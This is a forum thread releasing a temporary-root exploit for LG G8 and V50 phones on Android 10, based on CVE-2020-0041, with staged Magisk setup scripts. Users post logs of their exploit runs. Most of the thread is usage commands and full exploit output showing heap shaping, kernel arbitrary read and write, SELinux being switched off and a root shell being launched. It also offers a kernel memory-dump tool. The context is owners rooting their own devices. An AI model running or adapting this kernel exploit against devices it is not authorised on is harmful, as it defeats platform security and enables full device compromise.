
[LG G8] temp root exploit via CVE-2020-0041 including magisk setup


j4nn

Senior Member
Jan 4, 2012
temp root exploit for LG G8 ThinQ with android 10 firmware
including temporary magisk setup from the exploit

The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
I have adapted the Pixel 3 specific exploit for kernel 4.14 that is used with LG phones running Android 10 with March security patch level.
This work has been done upon request of @Inerent who contributed not only with very fine donations, but also did all the testing on his LG phone, as I do not own any LG phone myself.

As an add-on I have implemented setup of magisk v20.4 from the temp root exploit, including su permission-asking notification support, which has also been a hell of work to get working.

SUPPORTED TARGETS
You can find currently running fw version with 'getprop ro.vendor.lge.factoryversion' command run in an adb shell.
  • LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
  • LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
  • LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
  • LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
  • LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
  • LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
  • LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
  • LMG820AT-00-V20a-LAO-COM-NOV-25-2019-ARB00+0 - Sprint G8 Android 10 beta November 2019 security patch (special treat for @antintin)
  • LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1 - Sprint G8 fw 20d
  • LMG820AT-00-V20d-LAO-COM-JAN-29-2020-ARB00+0 - T-Mobile US G8 January 2020 security patch
  • LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0 - Sprint G8 fw 20e February 2020 patch
  • LMG820AT-00-V20a-LAO-COM-JAN-09-2020-ARB00+5 - Verizon G8 fw 20a
  • LMG820AT-00-V20i-LAO-COM-JAN-07-2020-ARB00+0 - AT&T G8 fw 20i
  • LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0 - AT&T G8 G820UM fw 20j
  • LMG820AT-00-V21b-LAO-COM-FEB-05-2020-ARB00+1 - Amazon G8 (G820QM821b_01_AMZ_US_OP_0205)
Please note, it is unlikely that any other fw version than those listed above would work.
The only (unlikely) case in which the exploit could work with a different fw version (or a different phone model) would be if it used a binary-identical kernel image in the firmware.

USAGE HOWTO
  • be sure to run supported firmware version on your phone (you may need to downgrade, involving factory reset)
  • enable developer mode options and in there adb debugging (eventually install adb drivers)
  • download the v50g8-mroot3.zip with the exploit attached in this post and unzip it
  • use 'adb push v50g8-mroot3 /data/local/tmp' and get temp root with following commands in 'adb shell':
    Code:
    cd /data/local/tmp
    chmod 755 ./v50g8-mroot3
    ./v50g8-mroot3

If it worked, you should see something like this:
Code:
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
...
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root) context=kernel
root_by_cve-2020-0041:/data/local/tmp #

In case you get 'target is not supported', you may list supported targets with
Code:
./v50g8-mroot3 -T
and try to force one close to yours using '-t num' option.

Please see the 2nd post for magisk setup from temp root details.

Please be careful what you use the temp root for.
Changing something in partitions protected by dm-verity (or Android Verified Boot 2.0), like for example /system, /vendor or the kernel boot partition, can result in a phone that no longer boots.
In such a case you would need a way to emergency flash stock firmware to recover.
This is why it is called 'temp root' - you get a root shell only temporarily, it is lost with reboot and it does not allow making permanent changes in crucial partitions until bootloader unlock is achieved.
Some partitions might still be possible to modify - for example in the case of Sony Xperia phones it was possible to do a permanent debloat via changes in the /oem partition, and such a debloat would survive even a factory reset. Similarly, some modem configs have been present in /oem, allowing IMS to be set up for different operators/regions or other modem related stuff to be tuned.

SOURCES
Exploit sources for all releases are available at my github here.

CREDITS
Big thanks to Blue Frost Security for the excellent writeup and the exploit itself.

MEMORY DUMP FOR NEW TARGETS
I implemented a tool that dumps kernel space memory to a file, with the aim of being able to analyse it to add support for a new target in case there is no downloadable firmware for it.
You can start it similarly as done with v50g8-mroot3, including the '-t num' option.

Use this tool only in case your phone is not supported but it is exploitable (i.e. v50g8-mroot3 does something reasonable /with any '-t num' option/ including crash/reboot of the phone).
When v50g8-mroot3 says "target is not supported", use 'v50g8-mroot3 -T' to list supported targets and then 'v50g8-mroot3 -t num' changing num to each one of listed targets, one by one.
Watch the output log to see which is the most successful (the longest reasonable output if you do not count looping/repeating the same lines).

Having found the closest target this way, remember the '-t num' option and use it with v50g8-dump.
The tool hopefully creates the /data/local/tmp/memdump.bin file and then sleeps indefinitely.
Just open another cmd window and use
Code:
adb pull /data/local/tmp/memdump.bin
to get the file to your PC, compress it to an archive and post it here - it may eventually help to add support for new target which does not have a downloadable fw, like for example Sprint models.

DONATIONS
If you like my work, you can donate using the Donate to Me button with several methods there.

Already donated:
Thank you very much to all who donated or are about to donate.

DOWNLOAD
 

Attachments

  • v50g8-dump.zip (17.3 KB)
  • v50g8-mroot.zip (21.4 KB)
  • v50g8-mroot2.zip (21.7 KB)
  • v50g8-mroot3.zip (20.7 KB)

j4nn

Senior Member
Jan 4, 2012
MAGISK SETUP FROM TEMP ROOT WITH LOCKED BOOTLOADER
To enjoy the temporary root with apps asking for root permission, you can now start magisk v20.4 from the root shell provided by the exploit.
  • download the v50g8-mroot3.zip with the exploit attached in the first post
  • download Magisk-v20.4.zip from magisk releases page on github here
  • use 'adb push v50g8-mroot3.zip Magisk-v20.4.zip /data/local/tmp' to copy the zips to the phone
  • unzip and prepare magisk setup with following commands in 'adb shell'
    Code:
    cd /data/local/tmp
    unzip v50g8-mroot3.zip
    chmod 755 v50g8-mroot3 magisk-setup.sh magisk-start.sh
    ./magisk-setup.sh
  • get temp root and start magisk up with following commands in 'adb shell':
    Code:
    cd /data/local/tmp
    ./v50g8-mroot3
    ./magisk-start.sh -1
    ./magisk-start.sh -2
    ./magisk-start.sh -3
    Just this step needs to be repeated after each reboot to get magisk running again.
    NOTE: please be sure to enter each command separately, line after line - do not paste all in a single block and do not put them in a script.
    There are reasons this is divided in 3 stages. With this approach I got the best stability, while putting ./v50g8-mroot3 together with -1 and/or -2 stuff in a single script run resulted in a reboot most of the time.
    Phases 2 and 3 need to be split for functional reasons to start magisk with a working su permission-asking notification.

If it worked, you should see something like this:

Code:
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ ./v50g8-mroot3
[+] factoryversion = LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1                                                                                                                                                     
+ FRESH=false 
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2                                                                                                                                                     
+ FRESH=false 
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2 
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config 
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config 
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148 
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate 
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3                                                                                                                                                     
+ FRESH=false 
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3 
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd 
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC='' 
+ timeout=10 
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10 
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165 
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10 
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9 
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id                                                                                                                                                                       
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.14.117-perf #1 SMP PREEMPT Tue Mar 10 18:44:38 KST 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce                                                                                                                                                               
Permissive

Now you can exit the temp root shell and use 'su' to get a root shell controlled by magisk manager or allow other apps that need root as asking for root permission now works.
You can even re-enable selinux like this from 'adb shell':
Code:
su -c 'setenforce 1'
The magisk setup from exploit including working permission asking has been fully developed by me, it uses some novel techniques to overcome the limitations caused by magisk run from a temp root instead of being integrated in boot process as a service.

TIPS FOR BETTER STABILITY OF THE EXPLOIT
The exploit works based on a use after free, which means it depends on the state of the memory heap and how it changes while the exploit runs.
That means there is some portion of unpredictability and a chance that something else is overwritten than what was hoped for when shaping the heap.
So to get the best results, one should stop anything that could run in the background, like:
  • set airplane mode, turn off wifi and bluetooth so there is no data connection at all
  • set "Stay awake" to ON while charging (i.e. using adb shell) in developer options
  • disable auto updates of system and apps
  • debloat your system so useless apps do not run in background
  • reboot your phone having all the above
  • wait two minutes after boot up with phone unlocked, screen on connected to PC via usb cable having 'adb shell' already active (checking with 'uptime' command)
  • start the exploit
  • after getting the root shell and successfully starting magisk, do not forget to properly exit the temp root shell by using the 'exit' command two times, so the 'adb shell' with the exploit is ended with the rest of the clean up

CHANGELOG
  • 2020-05-16 : multiple targets supported (v50g8-root)
  • 2020-05-20 : added v50g8-dump tool to dump kernel space memory
  • 2020-05-24 : implemented support for magisk start from the exploit (v50g8-mroot), added support for 4 new G8 targets (3 x Sprint and one T-Mobile US)
  • 2020-06-10 : fixed problem when V50 rebooted/crashed soon after obtaining temp root shell, added support for 3 new G8 targets (Verizon and 2 x AT&T), released as v50g8-mroot2
  • 2020-06-23 : added support for Amazon G8 target and hopefully fixed not getting a root shell problem with mroot2 on G8, released as v50g8-mroot3
 

tron1

Senior Member
Aug 24, 2005
This is my result for Sprint G8 February patch overriding with -t 4 "LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2"
It gets stuck at the line "[*] Reallocating content of 'write8_selinux' with controlled data................."

Edit: Tried it again with the same -t 4 parameter, guess what? I have ROOT! (*) see below.

alphalm:/data/local/tmp $ ./v50g8-root -t 4
./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
.
.
.
sched_setafinnity(): Invalid argument
[+] pipe file: 0xfffffff0aeced700
[*] file epitem at ffffffef820efd00
[*] Reallocating content of 'write8_inode' with controlled data......[DONE]
[+] Overwriting 0xfffffff0aeced720 with 0xffffffef820efd50...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff821ca21050
[+] kernel base: ffffff821b480000
[*] init_cred: ffffff821d82e588
[+] memstart_addr: 0xffffffd100000000
[+] First level entry: b43c0003 -> next table at ffffffefb43c0000
[+] Second level entry: dd466003 -> next table at ffffffefdd466000
[+] sysctl_table_root = ffffff821d85b098
[*] Reallocating content of 'write8_sysctl' with controlled data..............[DONE]
[+] Overwriting 0xfffffff0f534b768 with 0xffffffefffacd000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data.................


(*)
alphalm:/data/local/tmp $ ./v50g8-root -t 4
./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
.
.
.
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffe2a13e0000
[*] file epitem at ffffffe2cc823800
[*] Reallocating content of 'write8_inode' with controlled data..[DONE]
[+] Overwriting 0xffffffe2a13e0020 with 0xffffffe2cc823850...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff8a59221050
[+] kernel base: ffffff8a57c80000
[*] init_cred: ffffff8a5a02e588
[+] memstart_addr: 0xffffffde40000000
[+] First level entry: 1221a8003 -> next table at ffffffe2e21a8000
[+] Second level entry: 1221a1003 -> next table at ffffffe2e21a1000
[+] sysctl_table_root = ffffff8a5a05b098
[*] Reallocating content of 'write8_sysctl' with controlled data........[DONE]
[+] Overwriting 0xffffffe3b534a468 with 0xffffffe2cf35e000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff8a5a7ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 7360, kaddr ffffffe25d899400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 7099, kaddr ffffffe2cc8e6400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 7384, kaddr ffffffe33791d380
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffe2a13e0020
[*] epitem.prev = ffffffe2a13e00d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #
 

siulmagic

Senior Member
Jun 23, 2007
This is on my Sprint G8, forced with -t 7, which is the closest one to my firmware. My log https://pastebin.com/sfgDn8kb

Edit: it seems I did not use the -t num closest to my firmware, I don't quite understand which firmware corresponds to what number.

Edit2:NVM I think I figured it out.

edit3: got Temp root with -t 2 this is my log https://pastebin.com/zUEucCie. software version 20d
firmware LMG820AT-00-V20d-LAO-COM-DEC-17-2019-ARB00+1
 

j4nn

Senior Member
Jan 4, 2012
Please keep posting your logs from the exploit confirming your target to work.
In case you have an unsupported target, like Sprint for example and you find any '-t num' option eventually working, please be sure to post it here with info about your phone model and carrier. It would be useful for others.
Thanks.
 

firedroidx

Senior Member
Dec 20, 2015
AT&T people running LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0, I think we might be out of luck for now. I've tried every single forced target. Here's my log.
C:\adb tools\platform-tools>adb push v50g8-root /data/local/tmp
v50g8-root: 1 file pushed. 1.2 MB/s (42984 bytes in 0.034s)

C:\adb tools\platform-tools>adb shell
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root -T
supported targets:
0 : LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
1 : LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
2 : LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
3 : LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
4 : LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
5 : LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
6 : LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
7 : LMV500AT-00-V20a-LAO-COM-JAN-24-2020+0
8 : LMV500AT-00-V20e-LAO-COM-JAN-23-2020+0
9 : LMV500AT-00-V20g-LAO-COM-MAR-10-2020+0
10 : LMV500NAT-00-V20b-LAO-COM-DEC-23-2019+0
11 : LMV500NAT-00-V20f-LAO-COM-JAN-31-2020+0
12 : LMV500NAT-00-V20m-LAO-COM-MAR-10-2020+0
alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20j-LAO-COM-FEB-04-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
..............
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffc7da0f0200
[*] file epitem at ffffffc810e0e700
[*] Reallocating content of 'write8_inode' with controlled data....[DONE]
[+] Overwriting 0xffffffc7da0f0220 with 0xffffffc810e0e750...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff9d68421050
[+] kernel base: ffffff9d66e80000
[*] init_cred: ffffff9d6922e588
[+] memstart_addr: 0x73253d45505954
[+] First level entry: 14beda003 -> next table at ffffffc4069d46ac

^ Phone reboots after this line. With certain targets it gets stuck at "Reallocating content of 'write8_inode' with controlled data.............," but for the G820 targets it always does what's shown above.

I did a factory reset and followed the steps of disabling network, rebooting, etc to see if it would work. Nothing so far. Any other AT&T G820UM people let me know if you find anything
 

brigantti

Senior Member
Jul 25, 2013
Now that we got temp root I would like to ask: can I make changes to build.prop? Or will it brick the phone after reboot? I got a Sprint G8 so there's no kdz for it.

---------- Post added at 11:07 PM ---------- Previous post was at 10:52 PM ----------

LG G8 Sprint 20e temp root
log from PowerShell

PS C:\adb binaries\adb binaries> adb shell
adb server is out of date. killing...
* daemon started successfully *
alphalm:/ $ cd /data/local/tmp
alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
target is not supported.
1|alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffeb21b58900
[*] file epitem at ffffffeb328e1780
[*] Reallocating content of 'write8_inode' with controlled data..[DONE]
[+] Overwriting 0xffffffeb21b58920 with 0xffffffeb328e17d0...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff8e75e21050
[+] kernel base: ffffff8e74880000
[*] init_cred: ffffff8e76c2e588
[+] memstart_addr: 0xffffffd600000000
[+] First level entry: 137d8c003 -> next table at ffffffeb37d8c000
[+] Second level entry: 15c0b4003 -> next table at ffffffeb5c0b4000
[+] sysctl_table_root = ffffff8e76c5b098
[*] Reallocating content of 'write8_sysctl' with controlled data........[DONE]
[+] Overwriting 0xffffffebf534b468 with 0xffffffebc8a14000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data....[DONE]
[+] Overwriting 0xffffff8e773ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 17471, kaddr ffffffeae0c9ec00
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 17342, kaddr ffffffeb20036380
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 17947, kaddr ffffffebcd377400
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffeb21b58920
[*] epitem.prev = ffffffeb21b589d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #
 

siulmagic

Senior Member
Jun 23, 2007

Do not make changes to system partitions until we have fully working magisk and bl unlock.
 

crazynapkinman

Senior Member
Jun 16, 2014

PS C:\Users\Matt Hinkle\Desktop\adb binaries> cmd
Microsoft Windows [Version 10.0.19041.264]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Users\Matt Hinkle\Desktop\adb binaries>adb devices
List of devices attached
LMG820UMcd000429 device


C:\Users\Matt Hinkle\Desktop\adb binaries>adb shell
alphalm:/ $ cd data/local/tmp
alphalm:/data/local/tmp $ chmod r77 ./v50g8-root
chmod: bad mode 'r77'
1|alphalm:/data/local/tmp $ chmod 755 ./v50g8-root
alphalm:/data/local/tmp $ ./v50g8-root -t 4
[+] factoryversion = 'LMG820AT-00-V20e-LAO-COM-FEB-05-2020-ARB00+0'
[+] forced use of 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
sched_setafinnity(): Invalid argument
sched_setafinnity(): Invalid argument
.
.
.
sched_setafinnity(): Invalid argument
[+] pipe file: 0xffffffe78e7f9700
[*] file epitem at ffffffe7693ca800
[*] Reallocating content of 'write8_inode' with controlled data........[DONE]
[+] Overwriting 0xffffffe78e7f9720 with 0xffffffe7693ca850...[DONE]
[*] Write done, should have arbitrary read now.
[+] file operations: ffffff9698421050
[+] kernel base: ffffff9696e80000
[*] init_cred: ffffff969922e588
[+] memstart_addr: 0xffffffd940000000
[+] First level entry: 14d681003 -> next table at ffffffe80d681000
[+] Second level entry: 1094dd003 -> next table at ffffffe7c94dd000
[+] sysctl_table_root = ffffff969925b098
[*] Reallocating content of 'write8_sysctl' with controlled data..[DONE]
[+] Overwriting 0xffffffe8b534b068 with 0xffffffe7d9b4d000...[DONE]
[+] Injected sysctl node!
[*] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff96999ceffc with 0x0...[DONE]
[*] Node write8_inode, pid 19750, kaddr ffffffe813909480
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_selinux, pid 19833, kaddr ffffffe7f55a9c00
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[*] Node write8_sysctl, pid 19783, kaddr ffffffe78bac7c80
[*] Replaced sendmmsg dangling reference
[*] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[*] epitem.next = ffffffe78e7f9720
[*] epitem.prev = ffffffe78e7f97d0
[*] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp #


That's what I got on my Sprint G8 February Security patch using "-t 4". First try.

TEMP ROOOOOT!
 

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@KamioRinn, unfortunately I do not have an easy method to find all the offsets - it involves some reverse engineering work and it needs target kernel image.
Which G8/V50 would you like to get support for?
Just point me to a downloadable kdz and I can try to add support for it.
 

KamioRinn

New member
May 17, 2020
2
0
@KamioRinn, unfortunately I do not have an easy method to find all the offsets - it involves some reverse engineering work and it needs target kernel image.
Which G8/V50 would you like to get support for?
Just point me to a downloadable kdz and I can try to add support for it.

Thanks.
The AT&T version can't get an OTA in our country. They still use the um10i version.
But I can't find the kdz of um10i. Maybe it is the same as qm10i (G820QM10i_00_NAO_US_OP_0401).
 

tron1

Senior Member
Aug 24, 2005
187
164
Stuttgart
@j4nn
Could you please tell me which kdz is the base for the 'LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2' target?
 

antintin

Senior Member
Sep 11, 2019
595
137
LG V40
LG G8
@KamioRinn, unfortunately I do not have an easy method to find all the offsets - it involves some reverse engineering work and it needs target kernel image.
Which G8/V50 would you like to get support for?
Just point me to a downloadable kdz and I can try to add support for it.
Hello, I private messaged you a bit earlier. So I'm on November patch, and that means there is no way for you to make it work then?
 

j4nn

Senior Member
Jan 4, 2012
1,227
2,404
@KamioRinn, @motogvasyag, @antintin
Guys, please try all available '-t num' options and see which one of them gets the furthest in the log, then post it here in text form from the beginning, so we can see which factoryversion is on the phone and which -t worked best.
I need a kernel binary image that is running on the phone unfortunately.
@tron1, that is from G820UM20b_02_VZW_US_OP_0212.
 

antintin

Senior Member
Sep 11, 2019
595
137
LG V40
LG G8
@KamioRinn, @motogvasyag, @antintin
Guys, please try all available '-t num' options and see which one of them gets the furthest in the log, then post it here in text form from the beginning, so we can see which factoryversion is on the phone and which -t worked best.
I need a kernel binary image that is running on the phone unfortunately.

@tron1, that is from G820UM20b_02_VZW_US_OP_0212.

Sure, all the g8 forced options give me the exact same results. I'll just include the one from -t 0 in the results I show, but they each restart my phone on the same step. The v50 forced options get stuck a bit earlier.
 

Attachments

  • sprintg8novemberpatchresults.txt (2.6 KB)

Top Liked Posts

    temp root exploit for LG G8 ThinQ with android 10 firmware
    including temporal magisk setup from the exploit

    The exploit uses CVE-2020-0041 originally designed for Pixel 3 running kernel 4.9.
    I have adapted the Pixel 3 specific exploit for kernel 4.14 that is used with LG phones running Android 10 with March security patch level.
    This work has been done upon request of @Inerent who contributed not only with very fine donations, but also did all the testing on his LG phone, as I do not own any LG phone myself.

    As an add-on I have implemented setup of magisk v20.4 from the temp root exploit, including su permission asking notification support, which has also been a hell of a lot of work to get working.

    SUPPORTED TARGETS
    You can find the currently running fw version with the 'getprop ro.vendor.lge.factoryversion' command run in an adb shell.
    • LMG820NAT-00-V20j-LAO-COM-FEB-12-2020+0
    • LMG820NAT-00-V20m-LAO-COM-MAR-18-2020+0
    • LMG820AT-00-V20a-LAO-COM-DEC-23-2019-ARB00+9
    • LMG820AT-00-V20b-LAO-COM-JAN-10-2020-ARB00+0
    • LMG820AT-00-V20b-LAO-COM-FEB-12-2020-ARB00+2
    • LMG820AT-00-V20c-LAO-COM-MAR-19-2020-ARB00+0
    • LMG820AT-00-V20d-LAO-COM-JAN-28-2020-ARB00+0
    • LMG820AT-00-V20a-LAO-COM-NOV-25-2019-ARB00+0 - Sprint G8 Android 10 beta November 2019 security patch (special treat for @antintin)
